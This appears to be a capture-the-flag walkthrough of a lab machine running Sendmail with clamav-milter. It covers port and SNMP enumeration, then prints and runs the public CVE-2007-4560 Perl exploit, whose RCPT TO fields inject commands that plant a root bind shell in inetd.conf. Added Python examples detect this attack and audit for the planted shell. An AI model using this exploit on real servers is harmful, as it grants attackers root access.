ClamAV
Enumeration:
Port Scanning:
As always we are going to start with nmap:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 20:03 +03
Nmap scan report for 192.168.219.42
Host is up, received echo-reply ttl 61 (0.13s latency).
Scanned at 2025-10-01 20:03:43 +03 for 336s
Not shown: 65525 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3w
w6ryEkjNnb74KCooHOjyeGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k
23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1IZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7
s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznfC3fRtmj2e/L9chzg=
| 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH
/fjz9FK4HQPC7WtXY9EgW4IMB+pzX2KZxK2PF0=
25/tcp open smtp syn-ack ttl 61 Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.186], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For
more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmas
ter at your site. 2.0.0 End of HELP info
80/tcp open http syn-ack ttl 61 Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux syn-ack ttl 61 Linux SNMP multiplexer
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
43523/tcp filtered unknown host-unreach from 10.73.110.248 ttl 62
58146/tcp filtered unknown host-unreach from 10.73.110.248 ttl 62
60000/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3w
w6ryEkjNnb74KCooHOjyeGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k
23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1IZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7
s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznfC3fRtmj2e/L9chzg=
| 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH
/fjz9FK4HQPC7WtXY9EgW4IMB+pzX2KZxK2PF0=
60578/tcp filtered unknown host-unreach from 10.73.110.248 ttl 62
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
I will also scan the top UDP ports:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -sCVU --top-ports=100 -vv -oA nmap/UPDservices --open 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 20:12 +03
Nmap scan report for 192.168.219.42
Host is up, received echo-reply ttl 61 (0.12s latency).
Scanned at 2025-10-01 20:12:56 +03 for 251s
Not shown: 97 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
137/udp open netbios-ns udp-response ttl 61 Samba nmbd netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces:
| hostname: 0XBABE
| interfaces:
|_ 192.168.219.42
138/udp open|filtered netbios-dgm no-response
161/udp open snmp udp-response ttl 61 SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 13m00s
| snmp-processes:
<snipped>
Several ports are open, so I will inspect each service on its own.
SNMP (161):
I will start with SNMP. Several tools can talk to an SNMP agent, such as onesixtyone, snmpwalk, snmpbulkwalk, snmp-check, etc. I will walk the tree with snmpbulkwalk and the default community string:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ snmpbulkwalk -c public -v2c -t 10 192.168.219.42
iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (317626) 0:52:56.26
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)"
<snipped>
iso.3.6.1.2.1.25.4.2.1.2.3773 = STRING: "klogd"
iso.3.6.1.2.1.25.4.2.1.2.3777 = STRING: "clamd"
iso.3.6.1.2.1.25.4.2.1.2.3782 = STRING: "clamav-milter"
iso.3.6.1.2.1.25.4.2.1.2.3791 = STRING: "inetd"
iso.3.6.1.2.1.25.4.2.1.2.3795 = STRING: "nmbd"
iso.3.6.1.2.1.25.4.2.1.2.3797 = STRING: "smbd"
iso.3.6.1.2.1.25.4.2.1.2.3801 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.3802 = STRING: "smbd"
iso.3.6.1.2.1.25.4.2.1.2.3808 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.3886 = STRING: "sendmail-mta"
iso.3.6.1.2.1.25.4.2.1.2.3900 = STRING: "atd"
<snipped>
The agent answers to the default community string public, which gives us the kernel version, the hostname and the full process list. Among the running processes we find clamd and clamav-milter alongside sendmail-mta, Samba (nmbd/smbd) and snmpd.
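To show what a readable default community string hands over, here is an added example (not part of the original walkthrough) that parses snmpbulkwalk output into an inventory and flags processes on a watchlist. The sample output is copied from the walk above with the snipped middle omitted; the OID constants are the standard sysDescr, sysName and HOST-RESOURCES-MIB hrSWRunName columns.

```python
"""Parse net-snmp walk output into an inventory and flag watched processes.

Added example for this walkthrough, not code from the original page.
SAMPLE_WALK is the snmpbulkwalk output shown above, minus the snipped part.
"""
import re

# "<oid> = <TYPE>: <value>" as printed by snmpwalk/snmpbulkwalk
LINE_RE = re.compile(r'^(\S+)\s*=\s*([A-Za-z-]+):\s*(.*)$')

SYS_DESCR = 'iso.3.6.1.2.1.1.1.0'
SYS_NAME = 'iso.3.6.1.2.1.1.5.0'
# HOST-RESOURCES-MIB hrSWRunName; the last OID component is the PID
HR_SW_RUN_NAME = 'iso.3.6.1.2.1.25.4.2.1.2.'

SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (317626) 0:52:56.26
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)"
<snipped>
iso.3.6.1.2.1.25.4.2.1.2.3773 = STRING: "klogd"
iso.3.6.1.2.1.25.4.2.1.2.3777 = STRING: "clamd"
iso.3.6.1.2.1.25.4.2.1.2.3782 = STRING: "clamav-milter"
iso.3.6.1.2.1.25.4.2.1.2.3791 = STRING: "inetd"
iso.3.6.1.2.1.25.4.2.1.2.3795 = STRING: "nmbd"
iso.3.6.1.2.1.25.4.2.1.2.3797 = STRING: "smbd"
iso.3.6.1.2.1.25.4.2.1.2.3801 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.3802 = STRING: "smbd"
iso.3.6.1.2.1.25.4.2.1.2.3808 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.3886 = STRING: "sendmail-mta"
iso.3.6.1.2.1.25.4.2.1.2.3900 = STRING: "atd"
"""


def parse_walk(output):
    """Return {oid: value}; STRING values lose their surrounding quotes."""
    table = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank lines and the "<snipped>" marker
        oid, typ, value = m.groups()
        if typ == 'STRING' and len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        table[oid] = value
    return table


def process_inventory(table):
    """Map PID -> process name from the hrSWRunName column."""
    procs = {}
    for oid, value in table.items():
        if oid.startswith(HR_SW_RUN_NAME):
            procs[int(oid[len(HR_SW_RUN_NAME):])] = value
    return procs


def summarize(output, watchlist):
    """Host identity, process count and the watched processes with their PIDs."""
    table = parse_walk(output)
    procs = process_inventory(table)
    return {
        'sysName': table.get(SYS_NAME),
        'sysDescr': table.get(SYS_DESCR),
        'process_count': len(procs),
        'watched': sorted((pid, name) for pid, name in procs.items() if name in watchlist),
    }


if __name__ == '__main__':
    # mail-path and AV daemons are the ones this box turns out to hinge on
    print(summarize(SAMPLE_WALK, {'clamd', 'clamav-milter', 'sendmail-mta'}))
```

Run against a live walk, the same function turns a `snmpbulkwalk -c public ...` capture into the asset record that should make a default community string show up in an audit.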
HTTP (80):
Browsing the website:

Nothing really interesting, just some binary text.

Exploitation:
Using what we have collected so far, I will search for public exploits for clamav:

Or simply using searchsploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ searchsploit clamav-milter
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is one result, written in Perl. I will mirror it to my current directory:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ searchsploit -m multiple/remote/4761.pl
Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/4761
Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
Codes: CVE-2007-4560
Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/ClamAV/4761.pl
We can read through it to understand how the attack works and to check whether it contains anything malicious beyond what we expect:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ cat 4761.pl
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]
It is command execution through the recipient field of the email: the two RCPT TO lines append a service entry to /etc/inetd.conf and restart inetd, which gives us a root bind shell on port 31337. I will run it with perl:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ perl 4761.pl 192.168.219.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.219.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Wed, 1 Oct 2025 18:18:40 -0400; (No UCE/UBE) logging access from: [192.168.45.186](FAIL)-[192.168.45
.186]
250-localhost.localdomain Hello [192.168.45.186], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 591MIeAQ004239 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
Both recipients were accepted, so the exploit seems to have worked.
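From the defender's side, the tell-tale of CVE-2007-4560 is a recipient whose local part carries shell metacharacters, and a mail gateway that never hands unvalidated recipients to a shell is not exposed at all. The following added example (not code from the walkthrough or from ClamAV) scans SMTP lines in either the client's RCPT TO form or sendmail's "250 2.1.5 ... Recipient ok" reply form for such local parts, and shows the allow-list check a gateway should apply. The sample lines are constructed; the two malicious recipients are the ones from the transcript above.

```python
"""Flag SMTP recipients whose local part carries shell metacharacters.

Added example for this walkthrough, not the milter's own code.  SAMPLE_LOG is
constructed: two benign lines plus the two recipients from the transcript above.
"""
import re

# Address inside <...> in "RCPT TO:<addr>" or in sendmail's "250 2.1.5 <addr>... Recipient ok".
# A quoted string inside the address may itself contain '>', so it is consumed as a unit.
ADDR_RE = re.compile(r'(?:RCPT\s+TO:\s*|250 2\.1\.5\s+)<((?:"[^"]*"|[^>"])*)>', re.IGNORECASE)

# characters a legitimate mailbox name has no use for but a shell does
SHELL_META = frozenset("|;&`$<>(){}\\'")
# strict allow-list for a local part (plus-addressing stays allowed)
SAFE_LOCAL = re.compile(r'^[A-Za-z0-9._%+-]+$')
SAFE_DOMAIN = re.compile(r'^[A-Za-z0-9.-]+$')

SAMPLE_LOG = [
    "RCPT TO:<alice+newsletter@example.test>",
    "250 2.1.5 <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\">... Recipient ok",
    "250 2.1.5 <nobody+\"|/etc/init.d/inetd restart\">... Recipient ok",
    'RCPT TO:<"john.doe"@example.test>',
]


def split_address(addr):
    """Return (local_part, domain); an '@' inside a quoted string is not a separator."""
    in_quote = False
    at = -1
    for i, ch in enumerate(addr):
        if ch == '"':
            in_quote = not in_quote
        elif ch == '@' and not in_quote:
            at = i
    if at < 0:
        return addr, ''
    return addr[:at], addr[at + 1:]


def classify_recipient(addr):
    """'high' for shell metacharacters, 'low' for any other unusual local part, None if clean."""
    local, _domain = split_address(addr)
    if SAFE_LOCAL.match(local):
        return None
    if any(ch in SHELL_META for ch in local):
        return 'high'
    return 'low'  # e.g. a quoted local part: legal per RFC 5321 but worth a look


def scan_smtp_lines(lines):
    """Return [(line_no, severity, address)] for every suspicious recipient."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ADDR_RE.search(line)
        if not m:
            continue
        sev = classify_recipient(m.group(1))
        if sev:
            findings.append((n, sev, m.group(1)))
    return findings


def accept_recipient(addr):
    """Allow-list check a gateway or milter applies before any further processing."""
    local, domain = split_address(addr)
    return bool(SAFE_LOCAL.match(local)) and bool(SAFE_DOMAIN.match(domain))


if __name__ == '__main__':
    for line_no, severity, address in scan_smtp_lines(SAMPLE_LOG):
        print(f'line {line_no}: {severity}: {address}')
```

The allow-list is deliberately stricter than RFC 5321, which permits quoted local parts; rejecting those up front is what makes the "pipe in the recipient" class of bug unreachable, whatever the downstream filter does with the address.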
I will use nmap again to scan if the port opened:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -p 31337 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 22:34 +03
Nmap scan report for 192.168.219.42
Host is up (0.21s latency).
PORT STATE SERVICE
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
It is indeed open. I will connect to it using netcat:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ nc -nv 192.168.219.42 31337
(UNKNOWN) [192.168.219.42] 31337 (?) open
/bin/bash -i
bash: no job control in this shell
root@0xbabe:/#
We are already root.
I will get the root flag:
root@0xbabe:/# cat /root/proof.txt
8e715ce73ff4440c8155fe8faaaad31a
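The foothold this exploit leaves behind is a line in /etc/inetd.conf, so the matching forensic check is to audit that file for services that spawn a shell or serve a bare port number as root. The following is an added example (not part of the walkthrough); the sample inetd.conf is constructed, with the last entry being the one the exploit appends.

```python
"""Audit an inetd.conf for entries that look like a planted backdoor.

Added example for this walkthrough, not code from the original page.
SAMPLE_INETD_CONF is constructed; its last line is the entry the exploit above appends.
"""
import os

SHELLS = {'sh', 'bash', 'dash', 'ksh', 'zsh', 'csh'}

SAMPLE_INETD_CONF = """\
# constructed sample /etc/inetd.conf, not taken from the target
#<service> <socket_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/in.ftpd
ident   stream  tcp     wait    identd  /usr/sbin/identd identd
31337 stream tcp nowait root /bin/sh -i
"""


def parse_inetd(text):
    """Split inetd.conf into entries; comments and malformed lines are skipped."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # service socket proto wait user server [args...]
        entries.append({
            'line': n, 'service': fields[0], 'socket': fields[1], 'proto': fields[2],
            'wait': fields[3], 'user': fields[4], 'server': fields[5], 'args': fields[6:],
        })
    return entries


def audit_inetd(text):
    """Return [(line_no, service, [reasons])] for entries worth a second look."""
    findings = []
    for e in parse_inetd(text):
        reasons = []
        # the shell may be the server itself or the program a wrapper such as tcpd runs
        programs = [e['server']] + e['args']
        if any(os.path.basename(p) in SHELLS for p in programs):
            reasons.append('server program is a shell')
        # a numeric service (no /etc/services name) running as root is unusual
        if e['service'].isdigit() and e['user'] == 'root':
            reasons.append('numeric port served as root')
        if reasons:
            findings.append((e['line'], e['service'], reasons))
    return findings


if __name__ == '__main__':
    for line_no, service, reasons in audit_inetd(SAMPLE_INETD_CONF):
        print(f'line {line_no} ({service}): ' + '; '.join(reasons))
```

On a real host, pair this with a listening-socket check (inetd only binds the port after the restart the exploit triggers), since an entry that has been added but not yet activated is just as much evidence of compromise.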